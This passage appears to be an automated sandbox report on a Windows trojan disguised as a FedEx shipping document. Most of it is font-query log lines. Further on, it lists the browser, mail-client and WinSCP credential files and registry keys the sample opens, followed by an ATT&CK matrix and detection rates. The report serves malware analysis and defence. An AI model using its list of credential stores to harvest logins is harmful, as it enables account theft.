        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: Yara match | File source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR
        MITRE ATT&CK Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 21 Input Capture | 131 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 21 Input Capture | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | 1 Data from Local System | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Antivirus, Machine Learning and Genetic Malware Detection

        Source | Detection | Scanner | Label | Link
        FeDex_shipping_document.exe | 38% | ReversingLabs | Win32.Trojan.Generic |
        FeDex_shipping_document.exe | 34% | Virustotal | | Browse
